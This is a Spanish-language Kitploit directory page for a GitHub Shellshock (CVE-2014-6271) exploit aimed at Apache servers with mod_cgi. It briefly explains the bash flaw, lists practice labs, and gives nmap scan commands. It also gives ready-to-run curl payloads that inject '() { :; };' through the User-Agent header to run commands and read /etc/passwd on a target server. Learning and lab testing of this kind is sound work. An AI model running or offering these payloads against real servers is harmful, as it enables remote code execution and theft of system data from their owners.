Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2014-6271 — Explotación de la vulnerabilidad "Shellshock". Ejecución remota de código en Apache con mod_cgi | Kitploit
Herramientas/GitHubGitHub/j0hnth3kn1ght/cve-2014-6271
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubj0hnth3kn1ght/cve-2014-6271

CVE-2014-6271

Explotación de la vulnerabilidad "Shellshock". Ejecución remota de código en Apache con mod_cgi

Ver Repositorio
5hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Explotación de Shellshock (CVE-2014-6271)

Shellshock es efectivamente una vulnerabilidad de ejecución remota de comandos en BASH. Este script explota la vulnerabilidad en el entorno web en Apache o similar con mod_cgi habilitado. La vulnerabilidad radica en la manipulación de variables de entorno, que son valores dinámicos con nombre que afectan a cómo se ejecutan los procesos en una computadora. Los atacantes pueden explotar esto adjuntando código malicioso a las variables de entorno, que se ejecuta al recibir dicha variable. Esto permite a los atacantes comprometer potencialmente el sistema.

Laboratorio para pruebas de vulnerabilidad

  • PentesterLab

  • VulnHub

  • TryHackMe

    Vídeo2

Buscar páginas CGI-BIN:

root@kitploit:~
$ nmap 192.168.x.x --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
$ nmap -sV -p- --script http-shellshock 192.168.x.x
$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x

Prueba manual:

root@kitploit:~
sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER-IP>
sudo curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" <WEBSERVER-IP>

Advertencia:

No soy responsable de ningún uso ilegal o daño causado por esta herramienta. Fue escrita por diversión, no para hacer el mal, y tiene como objetivo concienciar sobre el hacking y la ciberseguridad.

¡Buen hacking :)

Descargar herramienta